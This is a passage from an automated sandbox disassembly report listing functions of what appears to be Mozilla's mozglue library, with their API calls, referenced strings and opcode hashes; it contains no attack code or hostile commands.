                                                                  • Instruction ID: 2cde8c1a5d0a424f70b16e77f0f0362f9cf10adeb654802890ecbd7402759eaa
                                                                  • Opcode Fuzzy Hash: 28d351d31fe3d6d151821d03fd677d4a8afa90cc797d352383b32db9d3a9f7bf
                                                                  • Instruction Fuzzy Hash: 3781CF70A142069FDB08CF68D8D49AEBBB5FF8A314F04856CE805AB750D730E954CBA7
                                                                  APIs
                                                                  • GetTickCount64.KERNEL32 ref: 6C9D5D40
                                                                  • EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5D67
                                                                  • __aulldiv.LIBCMT ref: 6C9D5DB4
                                                                  • LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5DED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                  • String ID:
                                                                  • API String ID: 557828605-0
                                                                  • Opcode ID: c2a164c8fbb7b9964596b899bfaba50edfcc39c5847c8d31c674e66daeb394ca
                                                                  • Instruction ID: a09e7feb18cf790dbb8e1719a2514e5af75ff199bb26b4a138c90d2fedd6ed8f
                                                                  • Opcode Fuzzy Hash: c2a164c8fbb7b9964596b899bfaba50edfcc39c5847c8d31c674e66daeb394ca
                                                                  • Instruction Fuzzy Hash: 56515EB1E006568FCF18CF68CD54AAEBBB2FB95304F1A865DC815B7750C730A946CB90
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9BCEBD
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C9BCEF5
                                                                  • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C9BCF4E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$memset
                                                                  • String ID: 0
                                                                  • API String ID: 438689982-4108050209
                                                                  • Opcode ID: 64cee92bde6081aa2619c50463ae44c0b5554298f882bce379497ade4c64a639
                                                                  • Instruction ID: fafa9a98d5dfc62e19a6b6ed369b6f7c0524686cf4fbffcd7ffc1e4ad0fd15f1
                                                                  • Opcode Fuzzy Hash: 64cee92bde6081aa2619c50463ae44c0b5554298f882bce379497ade4c64a639
                                                                  • Instruction Fuzzy Hash: 8051F275A0021ACFCB00CF18C890A9AFBB5EF99304F198599E8595F351D735ED06CBE0
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA177FA
                                                                  • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CA17829
                                                                    • Part of subcall function 6C9ECC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C9B31A7), ref: 6C9ECC45
                                                                    • Part of subcall function 6C9ECC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C9B31A7), ref: 6C9ECC4E
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CA1789F
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CA178CF
                                                                    • Part of subcall function 6C9B4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9B4E5A
                                                                    • Part of subcall function 6C9B4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C9B4E97
                                                                    • Part of subcall function 6C9B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3EBD,6C9F3EBD,00000000), ref: 6C9B42A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                  • String ID:
                                                                  • API String ID: 2525797420-0
                                                                  • Opcode ID: d0655474ae4551b73cd5989cc88712875748ae0daccd7b5de624cf8849f974d5
                                                                  • Instruction ID: f8723535002fd257b131cd0ad640633b85adeecc48501ea3860dad976ac0632b
                                                                  • Opcode Fuzzy Hash: d0655474ae4551b73cd5989cc88712875748ae0daccd7b5de624cf8849f974d5
                                                                  • Instruction Fuzzy Hash: 5F419F719087469BD300DF29C88056BFBF4FFDA254F204A2EE4A987641DB30D999CBD2
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C9F82BC,?,?), ref: 6C9F649B
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9F64A9
                                                                    • Part of subcall function 6C9EFA80: GetCurrentThreadId.KERNEL32 ref: 6C9EFA8D
                                                                    • Part of subcall function 6C9EFA80: AcquireSRWLockExclusive.KERNEL32(6CA3F448), ref: 6C9EFA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9F653F
                                                                  • free.MOZGLUE(?), ref: 6C9F655A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3596744550-0
                                                                  • Opcode ID: be38996476576fefb123ba15209c1846ba4d1c559ebd55e592df713ed55ad484
                                                                  • Instruction ID: 0c8709a78fed17a26c74fb05994d698dfd7a4567e9e2420e989efb6214ca6fba
                                                                  • Opcode Fuzzy Hash: be38996476576fefb123ba15209c1846ba4d1c559ebd55e592df713ed55ad484
                                                                  • Instruction Fuzzy Hash: 4C31A2B5A043159FD704DF14D884A9EBBF4FF99318F00842EE85A97741DB30E919CB92
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?), ref: 6C9EFFD3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?), ref: 6C9EFFF5
                                                                  • free.MOZGLUE(?,?,?,?,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?), ref: 6C9F001B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?), ref: 6C9F002A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 826125452-0
                                                                  • Opcode ID: a66621e3dd0043785e743bac76800e63d22d2afb58be80af603dd309f70a3b07
                                                                  • Instruction ID: ac786c4de606d7da259e2922950c26f8bc1f5bc1dcc96cec2e2022d5bbea7359
                                                                  • Opcode Fuzzy Hash: a66621e3dd0043785e743bac76800e63d22d2afb58be80af603dd309f70a3b07
                                                                  • Instruction Fuzzy Hash: 352108B2A006165BD7189E78AC944AFB7BAEF993243250739D425D7780EA30DD1187D1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9CB4F5
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9CB502
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9CB542
                                                                  • free.MOZGLUE(?), ref: 6C9CB578
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: 46fef03587a5e72c4492354479212dc23970e937b9152a7fec6531e3718995c0
                                                                  • Instruction ID: e87a940f4059046adb69b7afa4d30cb982aab32d7faf4eadfeebb01cfee4521c
                                                                  • Opcode Fuzzy Hash: 46fef03587a5e72c4492354479212dc23970e937b9152a7fec6531e3718995c0
                                                                  • Instruction Fuzzy Hash: 8B11D530A14B42C7D3218F29D910762B3B5FF96319F10970AE84D93A02EB71F5C58792
                                                                  APIs
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C9BF20E,?), ref: 6C9F3DF5
                                                                  • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C9BF20E,00000000,?), ref: 6C9F3DFC
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9F3E06
                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C9F3E0E
                                                                    • Part of subcall function 6C9ECC00: GetCurrentProcess.KERNEL32(?,?,6C9B31A7), ref: 6C9ECC0D
                                                                    • Part of subcall function 6C9ECC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C9B31A7), ref: 6C9ECC16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                  • String ID:
                                                                  • API String ID: 2787204188-0
                                                                  • Opcode ID: dae0c8f434d8f472354760e3944d69bceeee423d98064deae85e38af74e1147b
                                                                  • Instruction ID: 344f9a75f0f7a683fec1c3ec4fecc308fbdfb9eff5aa004c1a6f6751a0941162
                                                                  • Opcode Fuzzy Hash: dae0c8f434d8f472354760e3944d69bceeee423d98064deae85e38af74e1147b
                                                                  • Instruction Fuzzy Hash: 5CF05E715003197BD704AB54EC41DAB372DEF56628F044020FD0C57700D639F91A86E7
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA020B7
                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C9EFBD1), ref: 6CA020C0
                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C9EFBD1), ref: 6CA020DA
                                                                  • free.MOZGLUE(00000000,?,6C9EFBD1), ref: 6CA020F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: 8cc544e52ace1e4c7fd59e50792c404fe194bde7c1de9266eed7bbb5d1451e25
                                                                  • Instruction ID: 59457d9cd9344ca0d4196caff561e678e059c46d20b52f8a9f4c97677d2610a4
                                                                  • Opcode Fuzzy Hash: 8cc544e52ace1e4c7fd59e50792c404fe194bde7c1de9266eed7bbb5d1451e25
                                                                  • Instruction Fuzzy Hash: D1E0EC31700B155BC7305F25BC1868EB7F9EF862597144316E40AC3700D775F94687D5
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CA085D3
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CA08725
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                  • String ID: map/set<T> too long
                                                                  • API String ID: 3720097785-1285458680
                                                                  • Opcode ID: 46e04d95943d1e10143d78c7d841989dd4d91082a5f9cef4fbc3b9baa0adefe7
                                                                  • Instruction ID: be296b4dcd5a4d1e188535fee08ce4e5df314275fcb9751a6757e16d678fb7f6
                                                                  • Opcode Fuzzy Hash: 46e04d95943d1e10143d78c7d841989dd4d91082a5f9cef4fbc3b9baa0adefe7
                                                                  • Instruction Fuzzy Hash: A4516674600641CFD701CF18D184A96BBF1BF4A358F1AC18AD8595BB52C335E885CF96
                                                                  APIs
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C9BBDEB
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9BBE8F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                  • String ID: 0
                                                                  • API String ID: 2811501404-4108050209
                                                                  • Opcode ID: 4eb367a5406ca9bb3cf8342e93db04bf6a6fe59c7ca5d25541b18066b702a911
                                                                  • Instruction ID: 66e1b74c64468bc6fc78b7b4c60f94a8e3f1fe167f2aa67ecfa707c7a819116a
                                                                  • Opcode Fuzzy Hash: 4eb367a5406ca9bb3cf8342e93db04bf6a6fe59c7ca5d25541b18066b702a911
                                                                  • Instruction Fuzzy Hash: 60419171909745EFC711CF38C4C1A9BB7F4AF9A348F008A1DF985A7661D730D9598B82
                                                                  APIs
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9F3D19
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C9F3D6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _errnomozalloc_abort
                                                                  • String ID: d
                                                                  • API String ID: 3471241338-2564639436
                                                                  • Opcode ID: 1a62f269609e59894836d8e298911c4e9be286a643195ec7c6e2d9292dca38f9
                                                                  • Instruction ID: 553e3f849e8de22f7f4854f71edfbdd02af7bbc5504f9a16707a65230a006702
                                                                  • Opcode Fuzzy Hash: 1a62f269609e59894836d8e298911c4e9be286a643195ec7c6e2d9292dca38f9
                                                                  • Instruction Fuzzy Hash: 32110431E047899BDB048B69CC144FDB779FFAA318B48D318DC5997602EB34E986C7A1
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9C44B2,6CA3E21C,6CA3F7F8), ref: 6C9C473E
                                                                  • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C9C474A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetNtLoaderAPI
                                                                  • API String ID: 1646373207-1628273567
                                                                  • Opcode ID: a298a75bebdb20d16855a6a7e72777d2a9a27e00a9af0208690ee5022e67d2de
                                                                  • Instruction ID: 97db9ea7801fbad4ecd2dd190f8bfdec9eddff12b27c1839e11734315467703e
                                                                  • Opcode Fuzzy Hash: a298a75bebdb20d16855a6a7e72777d2a9a27e00a9af0208690ee5022e67d2de
                                                                  • Instruction Fuzzy Hash: 140192753003158FDF18AFA99C586297BB9EB9B715B048069EE09C7340CB74D8028F92
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CA16E22
                                                                  • __Init_thread_footer.LIBCMT ref: 6CA16E3F
                                                                  Strings
                                                                  • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CA16E1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footergetenv
                                                                  • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                  • API String ID: 1472356752-1153589363
                                                                  • Opcode ID: abc1c822e617bc3cbee2eb00ae373b1ac04d9fe14890a1a96c47de10c4fb0bea
                                                                  • Instruction ID: 10356be5b688228000c183b238b28d88e7603d9e36e508067db0fce8029ce566
                                                                  • Opcode Fuzzy Hash: abc1c822e617bc3cbee2eb00ae373b1ac04d9fe14890a1a96c47de10c4fb0bea
                                                                  • Instruction Fuzzy Hash: 09F0F6353083C18FDB149668CC70ED13771A723218F08429AD809C6FB1D720E587CA62
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C9EEF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: Infinity$NaN
                                                                  • API String ID: 1385522511-4285296124
                                                                  • Opcode ID: 2fcca526c39ef9009160cab413dbef6d500f227b548bf36aa4801849bc48875a
                                                                  • Instruction ID: b0e76e43943c63560710865dad35faf10484c416d417906de1090d133bba51cd
                                                                  • Opcode Fuzzy Hash: 2fcca526c39ef9009160cab413dbef6d500f227b548bf36aa4801849bc48875a
                                                                  • Instruction Fuzzy Hash: 8AF0D170320342CEDB268B08EC2DB903371B72734CF15869ED90C8BA50D735A5878A82
                                                                  APIs
                                                                  • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C9CBEE3
                                                                  • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C9CBEF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CallsDisableLoadThread
                                                                  • String ID: cryptbase.dll
                                                                  • API String ID: 4137859361-1262567842
                                                                  • Opcode ID: 9538eda5d04f032a2a18fe1533e3b51fb658ce15ffcb5ef83ee31f859d6469bd
                                                                  • Instruction ID: 656a759b969b23bb31e33d9b07de884e9898aa8bf3fed4552f0755843862d6b6
                                                                  • Opcode Fuzzy Hash: 9538eda5d04f032a2a18fe1533e3b51fb658ce15ffcb5ef83ee31f859d6469bd
                                                                  • Instruction Fuzzy Hash: 16D0A732284608EBD714AA649C15B153B79A701715F20C020F309C4891C7B1D451CB92
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C9B4E9C,?,?,?,?,?), ref: 6C9B510A
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C9B4E9C,?,?,?,?,?), ref: 6C9B5167
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C9B5196
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C9B4E9C), ref: 6C9B5234
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
